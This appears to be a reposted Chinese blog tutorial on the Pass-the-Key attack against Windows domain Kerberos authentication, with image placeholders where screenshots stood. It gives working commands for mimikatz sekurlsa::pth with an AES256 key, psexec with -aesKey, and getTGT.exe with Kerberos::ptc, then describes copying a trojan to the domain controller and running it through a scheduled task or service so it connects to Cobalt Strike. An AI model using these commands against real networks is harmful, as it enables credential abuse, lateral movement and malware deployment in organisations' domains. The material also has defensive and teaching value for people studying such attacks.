PTK密钥传递攻击

PTK密钥传递攻击PTK PassThekey 中文叫密钥传递攻击 PTH 传递中 使用的是 NTLM HASH 值 PTK 使用 AES256 或者 AES128 的方式进行传递 PTK 攻击只能用于 kerberos 认证中 NT

大家好,欢迎来到IT知识分享网。

一. PTK密钥传递攻击原理

1. PTK介绍
2.PTK的原理-kerberos认证
3.AES KEY 到底是是什么

二. PTK的利用条件

根据上面原理的描述,那么进行PTK传递认证的条件有什么

必须是域环境,使用域账号才可以进行PTK 支持aes进行认证 
1.KB补丁介绍

Microsoft发布了KB补丁,它主要囊括了Windows 8.1和Windows Server 2012 R2中增强的安全保护机制。所以,以往的例如:Windows 7,Windows 8,Windows Server 2008R2和Windows Server2012也可以更新该补丁后获得上述安全保护机制。

https://blog.csdn.net/Ping_Pig/article/details/ 

在这里插入图片描述

2.PTK攻击

mimikatz进行传递

命令:sekurlsa::pth /user:用户名 /domain:域名或者IP /aes256:aeskey sekurlsa::pth /user:administrator /domain:DC.hack.com /aes256:e7f05284c76ba55a21d1085d0b6fcc71be4c0e8b4164a8adc8c 

在这里插入图片描述
抓包分析一下
在这里插入图片描述
这里出现的问题是因为使用mimikatz走的是NTLM挑战响应协议,这里需要换工具测试


psexec进行传递

命令:psexec.exe hack.com/ -aesKey e7f05284c76ba55a21d1085d0b6fcc71be4c0e8b4164a8adc8c 

在这里插入图片描述
抓包分析
在这里插入图片描述
这里可以看到走的是kerberos认证协议并且是用aes256
在这里插入图片描述
与多台机器进行传递攻击




三. 使用PTK进行上线CS

getTGT.exe hack.com/administrator -aesKey e7f05284c76ba55a21d1085d0b6fcc71be4c0e8b4164a8adc8c 
Kerberos::ptc 票据名字 

第三步:访问DC的C盘

在这里插入图片描述
接下来就是copy木马到DC上,再通过创建计划任务或者是服务运行木马使目标机上线!

免责声明:本站所有文章内容,图片,视频等均是来源于用户投稿和互联网及文摘转载整编而成,不代表本站观点,不承担相关法律责任。其著作权各归其原作者或其出版社所有。如发现本站有涉嫌抄袭侵权/违法违规的内容,侵犯到您的权益,请在线联系站长,一经查实,本站将立刻删除。 本文来自网络,若有侵权,请联系删除,如若转载,请注明出处:https://haidsoft.com/139828.html

(0)
上一篇 2025-06-01 19:15
下一篇 2025-06-01 19:20

相关推荐

发表回复

您的邮箱地址不会被公开。 必填项已用 * 标注

关注微信